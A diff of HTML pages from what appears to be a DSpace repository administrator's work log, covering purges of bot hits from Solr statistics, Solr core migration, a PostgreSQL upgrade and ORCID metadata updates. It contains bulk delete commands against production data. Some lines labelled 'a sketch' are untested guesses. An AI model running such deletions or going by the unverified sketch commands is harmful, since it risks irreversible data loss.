&#34;response&#34;:{&#34;numFound&#34;:12,&#34;start&#34;:0,&#34;docs&#34;:[
$ curl -s &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=82450&#39;
$ curl -s &#39;http://localhost:8081/solr/statistics/update?softCommit=true&#39;
$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&amp;fq=ip:78.128.99.24&amp;rows=10&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:62,&#34;start&#34;:0,&#34;docs&#34;:[
</code></pre><ul>
<li>A REST request with <code>limit=50</code> will make exactly fifty <code>statistics_type=view</code> statistics in the Solr core&hellip; fuck.
<ul>
@ -817,8 +817,8 @@ $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+s
<li>I tried to add the IPs to our nginx IP bot mapping but it doesn&rsquo;t seem to work&hellip; WTF, why is everything broken?!</li>
<li>Oh lord have mercy, the two AReS harvester IPs alone are responsible for 42 MILLION hits in 2019 and 2020 so far by themselves:</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:42395486,&quot;start&quot;:0,&quot;docs&quot;:[]
<pre tabindex="0"><code>$ http &#39;http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:42395486,&#34;start&#34;:0,&#34;docs&#34;:[]
</code></pre><ul>
<li>I modified my <code>check-spider-hits.sh</code> script to create a version that works with IPs and purged 47 million stats from Solr on CGSpace:</li>
</ul>
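<ul>
<li>A sketch of the IP version&rsquo;s invocation, assuming the same flags as the user agent version:</li>
</ul>
<pre tabindex="0"><code>$ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
</code></pre>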
@ -856,7 +856,7 @@ Total number of bot hits purged: 5535399
</ul>
</li>
</ul>
<pre tabindex="0"><code>add_header X-debug-message &quot;ua is $ua&quot; always;
<pre tabindex="0"><code>add_header X-debug-message &#34;ua is $ua&#34; always;
</code></pre><ul>
<li>Then in the HTTP response you see:</li>
</ul>
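<pre tabindex="0"><code>$ curl -s -o /dev/null -D - 'https://dspacetest.cgiar.org/' | grep -i x-debug-message
X-debug-message: ua is ...
</code></pre><ul>
<li>(a sketch; the value is whatever nginx&rsquo;s <code>$ua</code> map resolved for the request&rsquo;s user agent)</li>
</ul>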
@ -966,7 +966,7 @@ Total number of bot hits purged: 2228
</code></pre><ul>
<li>Then I purged about 200,000 Baidu hits from the 2015 to 2019 statistics cores with a few manual delete queries because they didn&rsquo;t have a proper user agent and the only way to identify them was via DNS:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2016/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;dns:*crawl.baidu.com.&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;dns:*crawl.baidu.com.&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
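<li>The same delete works for the other yearly cores, for example with a shell loop (a sketch):</li>
</ul>
<pre tabindex="0"><code>$ for year in 2015 2017 2018 2019; do curl -s "http://localhost:8081/solr/statistics-${year}/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "&lt;delete&gt;&lt;query&gt;dns:*crawl.baidu.com.&lt;/query&gt;&lt;/delete&gt;"; done
</code></pre><ul>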
<li>Jesus, the more I keep looking, the more I see ridiculous stuff&hellip;</li>
<li>In 2019 there were a few hundred thousand requests from CodeObia on Orange Jordan network&hellip;
@ -1024,7 +1024,7 @@ Total number of bot hits purged: 14110
<li>Though looking in my REST logs for the last month I am second guessing my judgement on 45.5.186.2 because I see user agents like &ldquo;Microsoft Office Word 2014&rdquo;</li>
<li>Actually no, the overwhelming majority of these are coming from something harvesting the REST API with no user agent:</li>
</ul>
<pre tabindex="0"><code># zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\&quot; '{print $6}' | sort | uniq -c | sort -h
<pre tabindex="0"><code># zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\&#34; &#39;{print $6}&#39; | sort | uniq -c | sort -h
1 Microsoft Office Word 2014
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office)
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
@ -1038,10 +1038,10 @@ Total number of bot hits purged: 14110
</code></pre><ul>
<li>I see lots of requests coming from the following user agents:</li>
</ul>
<pre tabindex="0"><code>&quot;Apache-HttpClient/4.5.7 (Java/11.0.3)&quot;
&quot;Apache-HttpClient/4.5.7 (Java/11.0.2)&quot;
&quot;LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)&quot;
&quot;EventMachine HttpClient&quot;
<pre tabindex="0"><code>&#34;Apache-HttpClient/4.5.7 (Java/11.0.3)&#34;
&#34;Apache-HttpClient/4.5.7 (Java/11.0.2)&#34;
&#34;LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)&#34;
&#34;EventMachine HttpClient&#34;
</code></pre><ul>
<li>I should definitely add HttpClient to the bot user agents&hellip;</li>
<li>Also, while <code>bot</code>, <code>spider</code>, and <code>crawl</code> are in the pattern list already and can be used for case-insensitive matching when used by DSpace in Java, I can&rsquo;t do case-insensitive matching in Solr with <code>check-spider-hits.sh</code>
@ -1171,7 +1171,7 @@ Total number of bot hits purged: 159
</li>
<li>I tried to migrate the 2019 Solr statistics again on CGSpace because the automatic sharding failed last month:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;
$ schedtool -D -e ionice -c2 -n7 dspace stats-util -s &gt;&gt; log/cron-stats-util.log.$(date --iso-8601)
</code></pre><ul>
<li>Interestingly I saw this in the Solr log:</li>
@ -1186,7 +1186,7 @@ $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s &gt;&gt; log/cron-stats-ut
</li>
<li>Manually create a core in the DSpace 6.4-SNAPSHOT instance on my local environment:</li>
</ul>
<pre tabindex="0"><code>$ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace63/solr/statistics&amp;dataDir=/home/aorth/dspace63/solr/statistics-2019/data'
<pre tabindex="0"><code>$ curl &#39;http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace63/solr/statistics&amp;dataDir=/home/aorth/dspace63/solr/statistics-2019/data&#39;
</code></pre><ul>
<li>After that the <code>statistics-2019</code> core was immediately available in the Solr UI, but after restarting Tomcat it was gone
<ul>
@ -1195,7 +1195,7 @@ $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s &gt;&gt; log/cron-stats-ut
</li>
<li>First export a small slice of 2019 stats from the main CGSpace <code>statistics</code> core, skipping Atmire schema additions:</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f 'time:2019-01-16*' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f &#39;time:2019-01-16*&#39; -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
</code></pre><ul>
<li>Then import into my local <code>statistics</code> core:</li>
</ul>
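<pre tabindex="0"><code>$ # a sketch, assuming the same import invocation as with the earlier export
$ ./run.sh -s http://localhost:8080/solr/statistics -a import -o /tmp/statistics-2019-01-16.json -k uid
</code></pre>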
@ -1226,8 +1226,8 @@ Moving: 21993 into core statistics-2019
</ul>
</li>
</ul>
<pre tabindex="0"><code>&lt;meta content=&quot;Thu hoạch v&amp;agrave; bảo quản c&amp;agrave; ph&amp;ecirc; ch&amp;egrave; đ&amp;uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)&quot; name=&quot;citation_title&quot;&gt;
&lt;meta name=&quot;citation_title&quot; content=&quot;Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)&quot; /&gt;
<pre tabindex="0"><code>&lt;meta content=&#34;Thu hoạch v&amp;agrave; bảo quản c&amp;agrave; ph&amp;ecirc; ch&amp;egrave; đ&amp;uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)&#34; name=&#34;citation_title&#34;&gt;
&lt;meta name=&#34;citation_title&#34; content=&#34;Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)&#34; /&gt;
</code></pre><ul>
<li><a href="https://jira.lyrasis.org/browse/DS-4397">DS-4397 controlled vocabulary loading speedup</a></li>
</ul>

View File

@ -42,7 +42,7 @@ You need to download this into the DSpace 6.x source and compile it
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -141,7 +141,7 @@ You need to download this into the DSpace 6.x source and compile it
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
</code></pre><h2 id="2020-03-03">2020-03-03</h2>
<ul>
@ -160,7 +160,7 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.ilri -m 203 -t correct -d
</code></pre><ul>
<li>But I have not run it on CGSpace yet because we want to ask Peter if he is sure about it&hellip;</li>
<li>Send a message to Macaroni Bros to ask them about their Drupal module and its readiness for DSpace 6 UUIDs</li>
@ -179,16 +179,16 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o /tmp/statistics-2010.json -k uid
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2010.json -k uid
$ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;time:2010*&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2010*&lt;/query&gt;&lt;/delete&gt;&#34;
$ ./run.sh -s http://localhost:8081/solr/statistics-2011 -a export -o /tmp/statistics-2011.json -k uid
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2011.json -k uid
$ curl -s &quot;http://localhost:8081/solr/statistics-2011/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;time:2011*&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &#34;http://localhost:8081/solr/statistics-2011/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2011*&lt;/query&gt;&lt;/delete&gt;&#34;
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2012.json -k uid
$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:3761989,&quot;start&quot;:0,&quot;docs&quot;:[]
$ curl -s 'http://localhost:8081/solr/statistics-2012/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:3761989,&quot;start&quot;:0,&quot;docs&quot;:[]
$ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;time:2012*&lt;/query&gt;&lt;/delete&gt;&quot;
$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:3761989,&#34;start&#34;:0,&#34;docs&#34;:[]
$ curl -s &#39;http://localhost:8081/solr/statistics-2012/select?q=time:2012*&amp;rows=0&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:3761989,&#34;start&#34;:0,&#34;docs&#34;:[]
$ curl -s &#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;time:2012*&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>I will do this for as many cores as I can (disk space limited) and then monitor the effect on the system and JVM memory usage
<ul>
@ -196,7 +196,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f 'time:/2014-0[1-6].*/'
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f &#39;time:/2014-0[1-6].*/&#39;
</code></pre><ul>
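<li>Then presumably the second half of the year with a similar date regex (a sketch):</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-2.json -k uid -f 'time:/2014-(0[7-9]|1[0-2]).*/'
</code></pre><ul>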
<li>Upgrade PostgreSQL from 9.6 to 10 on DSpace Test (linode19)
<ul>
@ -213,7 +213,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
# pg_dropcluster 10 main
# pg_upgradecluster 9.6 main
# pg_dropcluster 9.6 main
# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
# dpkg -l | grep postgresql | grep 9.6 | awk &#39;{print $2}&#39; | xargs dpkg -r
</code></pre><h2 id="2020-03-09">2020-03-09</h2>
<ul>
<li>Peter noticed that the Solr stats were not showing anything before 2020
@ -250,7 +250,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
<li>In Solr the IP is 127.0.0.1, but in the nginx logs I can luckily see the real IP (64.225.40.66), which is on Digital Ocean</li>
<li>I will purge them from Solr statistics:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;userAgent:&quot;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)&quot;&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>Another user agent that seems to be a bot is:</li>
</ul>
@ -258,14 +258,14 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
</code></pre><ul>
<li>In Solr the IP is 127.0.0.1 because of the misconfiguration, but in nginx&rsquo;s logs I see it belongs to three IPs on Online.net in France:</li>
</ul>
<pre tabindex="0"><code># zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' | awk '{print $1}' | sort | uniq -c
<pre tabindex="0"><code># zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep &#39;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#39; | awk &#39;{print $1}&#39; | sort | uniq -c
63090 163.172.68.99
183428 163.172.70.248
147608 163.172.71.24
</code></pre><ul>
<li>It is making 10,000 to 40,000 requests to XMLUI per day&hellip;</li>
</ul>
<pre tabindex="0"><code># zgrep -c 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' /var/log/nginx/access.log.{1..9}
<pre tabindex="0"><code># zgrep -c &#39;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#39; /var/log/nginx/access.log.{1..9}
/var/log/nginx/access.log.30.gz:18687
/var/log/nginx/access.log.31.gz:28936
/var/log/nginx/access.log.32.gz:36402
@ -284,7 +284,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2012/update?softCommit=tru
</code></pre><ul>
<li>I will purge those hits too!</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;userAgent:&quot;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&quot;&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;userAgent:&#34;Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)&#34;&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>Shit, and something happened and a few thousand hits from user agents with &ldquo;Bot&rdquo; in their user agent got through
<ul>
@ -348,7 +348,7 @@ Purging 62 hits from [Ss]pider in statistics
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2020-03-12-affiliations.csv WITH CSV HEADER;`
dspace=# \q
$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e 's/^line_number/id/' -e 's/text_value/name/' &gt; /tmp/affiliations.csv
$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e &#39;s/^line_number/id/&#39; -e &#39;s/text_value/name/&#39; &gt; /tmp/affiliations.csv
$ lein run /tmp/affiliations.csv name id
</code></pre><ul>
<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
@ -417,7 +417,7 @@ $ lein run /tmp/affiliations.csv name id
<li>Update Tomcat to version 7.0.103 in the Ansible infrastructure playbooks and deploy on DSpace Test (linode26)</li>
<li>Maria sent me a few new ORCID identifiers from Bioversity so I combined them with our existing ones, filtered the unique ones, and then resolved their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2020-03-26-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-03-26-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2020-03-26-combined-orcids.txt -o /tmp/2020-03-26-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -425,16 +425,16 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I checked the database for likely matches to the author name and then created a CSV with the author names and ORCID iDs:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;King, Brian&quot;,&quot;Brian King: 0000-0002-7056-9214&quot;
&quot;Ortiz-Crespo, Berta&quot;,&quot;Berta Ortiz-Crespo: 0000-0002-6664-0815&quot;
&quot;Ekesa, Beatrice&quot;,&quot;Beatrice Ekesa: 0000-0002-2630-258X&quot;
&quot;Ekesa, B.&quot;,&quot;Beatrice Ekesa: 0000-0002-2630-258X&quot;
&quot;Ekesa, B.N.&quot;,&quot;Beatrice Ekesa: 0000-0002-2630-258X&quot;
&quot;Gullotta, G.&quot;,&quot;Gaia Gullotta: 0000-0002-2240-3869&quot;
&#34;King, Brian&#34;,&#34;Brian King: 0000-0002-7056-9214&#34;
&#34;Ortiz-Crespo, Berta&#34;,&#34;Berta Ortiz-Crespo: 0000-0002-6664-0815&#34;
&#34;Ekesa, Beatrice&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
&#34;Ekesa, B.&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
&#34;Ekesa, B.N.&#34;,&#34;Beatrice Ekesa: 0000-0002-2630-258X&#34;
&#34;Gullotta, G.&#34;,&#34;Gaia Gullotta: 0000-0002-2240-3869&#34;
</code></pre><ul>
<li>Running the <code>add-orcid-identifiers-csv.py</code> script I added 32 ORCID iDs to items on CGSpace!</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Udana from IWMI asked about some items that are missing Altmetric donuts on CGSpace
<ul>
@ -447,13 +447,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</ul>
<h2 id="2020-03-29">2020-03-29</h2>
<ul>
<li>Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors' existing publications in the database using this CSV with my <code>add-orcid-identifiers-csv.py</code> script:</li>
<li>Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors&rsquo; existing publications in the database using this CSV with my <code>add-orcid-identifiers-csv.py</code> script:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Snook, L.K.&quot;,&quot;Laura Snook: 0000-0002-9168-1301&quot;
&quot;Snook, L.&quot;,&quot;Laura Snook: 0000-0002-9168-1301&quot;
&quot;Zheng, S.J.&quot;,&quot;Sijun Zheng: 0000-0003-1550-3738&quot;
&quot;Zheng, S.&quot;,&quot;Sijun Zheng: 0000-0003-1550-3738&quot;
&#34;Snook, L.K.&#34;,&#34;Laura Snook: 0000-0002-9168-1301&#34;
&#34;Snook, L.&#34;,&#34;Laura Snook: 0000-0002-9168-1301&#34;
&#34;Zheng, S.J.&#34;,&#34;Sijun Zheng: 0000-0003-1550-3738&#34;
&#34;Zheng, S.&#34;,&#34;Sijun Zheng: 0000-0003-1550-3738&#34;
</code></pre><ul>
<li>Deploy latest Bioversity and CIAT updates on CGSpace (linode18) and DSpace Test (linode26)</li>
<li>Deploy latest Ansible infrastructure playbooks on CGSpace and DSpace Test to get the latest dspace-statistics-api (v1.1.1) and Tomcat (7.0.103) versions</li>

View File

@ -48,7 +48,7 @@ The third item now has a donut with score 1 since I tweeted it last week
On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -171,14 +171,14 @@ On the same note, the one item Abenet pointed out last week now has a donut with
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ psql -h localhost -U postgres dspace -c &quot;DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE '%Ballantyne%';&quot;
<pre tabindex="0"><code>$ psql -h localhost -U postgres dspace -c &#34;DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE &#39;%Ballantyne%&#39;;&#34;
DELETE 97
$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p 'fuuu' -d
$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
</code></pre><ul>
<li>I used this CSV with the script (all records with his name have the name standardized like this):</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Ballantyne, Peter G.&quot;,&quot;Peter G. Ballantyne: 0000-0001-9346-2893&quot;
&#34;Ballantyne, Peter G.&#34;,&#34;Peter G. Ballantyne: 0000-0001-9346-2893&#34;
</code></pre><ul>
<li>Then I tried another way, to identify all duplicate ORCID identifiers for a given resource ID and group them so I can see if count is greater than 1:</li>
</ul>
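<ul>
<li>Something like this (a sketch, assuming <code>cg.creator.id</code> is metadata field 240 as in the <code>DELETE</code> below):</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT resource_id, text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 GROUP BY resource_id, text_value ORDER BY count(*) DESC) TO /tmp/2020-04-07-orcid-counts.csv WITH CSV HEADER;
</code></pre>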
@ -188,31 +188,31 @@ COPY 15209
<li>Of those, about nine authors had duplicate ORCID identifiers over about thirty records, so I created a CSV with all their name variations and ORCID identifiers:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Ballantyne, Peter G.&quot;,&quot;Peter G. Ballantyne: 0000-0001-9346-2893&quot;
&quot;Ramirez-Villegas, Julian&quot;,&quot;Julian Ramirez-Villegas: 0000-0002-8044-583X&quot;
&quot;Villegas-Ramirez, J&quot;,&quot;Julian Ramirez-Villegas: 0000-0002-8044-583X&quot;
&quot;Ishitani, Manabu&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Manabu, Ishitani&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Ishitani, M.&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Ishitani, M.&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Buruchara, Robin A.&quot;,&quot;Robin Buruchara: 0000-0003-0934-1218&quot;
&quot;Buruchara, Robin&quot;,&quot;Robin Buruchara: 0000-0003-0934-1218&quot;
&quot;Jarvis, Andy&quot;,&quot;Andy Jarvis: 0000-0001-6543-0798&quot;
&quot;Jarvis, Andrew&quot;,&quot;Andy Jarvis: 0000-0001-6543-0798&quot;
&quot;Jarvis, A.&quot;,&quot;Andy Jarvis: 0000-0001-6543-0798&quot;
&quot;Tohme, Joseph M.&quot;,&quot;Joe Tohme: 0000-0003-2765-7101&quot;
